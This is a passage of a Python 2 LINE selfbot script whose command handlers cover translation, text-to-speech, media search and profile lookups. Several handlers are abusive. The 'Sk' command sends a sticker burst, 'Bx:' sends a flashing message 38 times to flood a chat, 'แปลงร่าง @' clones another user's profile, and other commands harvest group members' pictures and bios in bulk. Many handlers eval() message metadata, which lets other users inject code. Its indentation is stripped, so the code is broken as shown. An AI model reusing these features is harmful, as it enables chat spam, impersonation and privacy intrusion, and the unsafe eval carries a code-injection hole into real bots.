elif msg.text in ["Sk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki1.sendMessage(msg)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki1.sendMessage(msg)
elif msg.text.lower() == 'mymid':
cl.sendText(msg.to,mid)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string + "")
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string)
elif msg.text in ["Myname","Mename"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["ตัส","Mey1"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["รูป","Mey2"]:
h = cl.getContact(mid)
cl.sendImageWithUrl(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["โปรวีดีโอ","Mey3"]:
h = cl.getContact(mid)
cl.sendVideoWithUrl(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["ลิ้งรูป","Mey4"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["ปก","Mey5"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
elif msg.text in ["ลิ้งปก","Mey6"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendText(msg.to, path)
elif "Getmid @" in msg.text:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif "#22Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Ph4" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif "Ph2" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "mh2" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "pull the picture" in msg.text:
nk0 = msg.text.replace("pull the picture","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"!!..ผิดพลาด")
pass
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
elif "#pictall" in msg.text:
nk0 = msg.text.replace("#pictall","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"!!..ผิดพลาด")
pass
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
elif "เชคหมด" in msg.text:
nk0 = msg.text.replace("เชคหมด","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"!!..ผิดพลาด")
pass
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithUrl(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
elif "Ph3vdo @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Ph3vdo @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendVideoWithUrl(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Ph3url @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Ph3url @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "2url @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("2url @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithUrl(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Ph2url @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Ph2url @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "เจ้งเตือน" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithUrl(msg.to,path)
elif "แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
elif msg.text in ["Mybb"]:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
#==========================================================#
elif "[Auto Respond]" in msg.text:
cl.sendImageWithUrl(msg.to, "http://dl.profile.line.naver.jp/0hlGvN3GXvM2hLNx8goPtMP3dyPQU8GSIgJVUpCTpiPVtiA3M2clJ-C2hia11mUn04cAJ-DWljOVBj")
elif "Fancytext: " in msg.text:
txt = msg.text.replace("Fancytext: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tx: " in msg.text:
txt = msg.text.replace("Tx: ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Bx: " in msg.text:
txt = msg.text.replace("Bx: ", "")
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
ki1.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tx10: " in msg.text:
txt = msg.text.replace("Tx10: ", "")
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
elif "Tr-id " in msg.text:
isi = msg.text.replace("Tr-id ","")
translator = Translator()
hasil = translator.translate(isi, dest='id')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-en " in msg.text:
isi = msg.text.replace("Tr-en ","")
translator = Translator()
hasil = translator.translate(isi, dest='en')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-th " in msg.text:
isi = msg.text.replace("Tr-th ","")
translator = Translator()
hasil = translator.translate(isi, dest='th')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-jp" in msg.text:
isi = msg.text.replace("Tr-jp ","")
translator = Translator()
hasil = translator.translate(isi, dest='ja')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Tr-ko" in msg.text:
isi = msg.text.replace("Tr-ko ","")
translator = Translator()
hasil = translator.translate(isi, dest='ko')
A = hasil.text
A = A.encode('utf-8')
cl.sendText(msg.to, A)
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO ENGLISH----\n" + "" + result + "\n------SUKSES-----")
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM EN----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Jp@id" in msg.text:
bahasa_awal = 'ja'
bahasa_tujuan = 'id'
kata = msg.text.replace("Jp@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@th ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----")
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Th@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@jp" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ja'
kata = msg.text.replace("Id@jp ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ar" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ar'
kata = msg.text.replace("Id@ar ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----")
elif "Ar@id" in msg.text:
bahasa_awal = 'ar'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ar@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif "Id@ko" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'ko'
kata = msg.text.replace("Id@ko ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----")
elif "Ko@id" in msg.text:
bahasa_awal = 'ko'
bahasa_tujuan = 'id'
kata = msg.text.replace("Ko@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----")
elif msg.text.lower() == 'welcome':
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
jawaban1 = ("ยินดีต้อนรับเข้าสู่กลุ่ม " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
tts = gTTS(text=jawaban1, lang='th')
tts.save('hasil.mp3')
cl.sendAudioWithUrl(msg.to,'hasil.mp3')
elif "Say-id " in msg.text:
say = msg.text.replace("Say-id ","")
lang = 'id'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
say = msg.text.replace("Say-en ","")
lang = 'en'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
say = msg.text.replace("Say-jp ","")
lang = 'ja'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Say-ar " in msg.text:
say = msg.text.replace("Say-ar ","")
lang = 'ar'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Say-ko " in msg.text:
say = msg.text.replace("Say-ko ","")
lang = 'ko'
tts = gTTS(text=say, lang=lang)
tts.save("hasil.mp3")
cl.sendAudioWithUrl(msg.to,"hasil.mp3")
elif "Kapan " in msg.text:
tanya = msg.text.replace("Kapan ","")
jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudioWithUrl(msg.to,'tts.mp3')
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Mungkin","Bisa jadi")
jawaban = random.choice(jawab)
tts = gTTS(text=jawaban, lang='id')
tts.save('tts.mp3')
cl.sendAudioWithUrl(msg.to,'tts.mp3')
elif '#dy ' in msg.text:
try:
textToSearch = (msg.text).replace('#dy ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
cl.sendVideoWithUrl(msg.to, ght)
except:
cl.sendText(msg.to,"Could not find it")
elif 'mp4 ' in msg.text:
try:
textToSearch = (msg.text).replace('mp4 ',"").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght = ('https://www.youtube.com' + results['href'])
cl.sendVideoWithUrl(msg.to, ght)
except:
cl.sendText(msg.to, "Could not find it")
elif "Lirik " in msg.text:
try:
songname = msg.text.lower().replace("Lirik ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif "/vk " in msg.text:
try:
wiki = msg.text.lower().replace("/vk ","")
wikipedia.set_lang("th")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Music " in msg.text:
try:
songname = msg.text.lower().replace("Music ","")
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithUrl(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif "#Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#ค้นหารูปภาพ:" in msg.text:
search = msg.text.replace("ค้นหารูปภาพ:","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithUrl(msg.to,path)
except:
pass
elif "#Profileig " in msg.text:
try:
instagram = msg.text.replace("#Profileig ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link
cl.sendImageWithUrl(msg.to, profileIG)
cl.sendText(msg.to, str(text))
except Exception as e:
cl.sendText(msg.to, str(e))
elif "Checkdate " in msg.text:
tanggal = msg.text.replace("Checkdate ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============")
elif msg.text in ["Time","time"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["วันอาทิต์", "วันจันทร์", "วันอังคาร", "วันพุธ", "วันพฤหัสบดี", "วันศุกร์", "วันเสาร์"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nเวลาขณะนี้ : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
#========================================================#
elif msg.text.lower() == 'ifconfig':
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif msg.text in ["Pmcheck","เชคดำ","เช็คดำ"]:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada Blacklist")
else:
cl.sendText(msg.to,"Daftar Banlist")
num=1
msgs="══════════List Blacklist═════════"
for mi_d in wait["blacklist"]:
msgs+="\n[%i] %s" % (num, cl.getContact(mi_d).displayName)
num=(num+1)
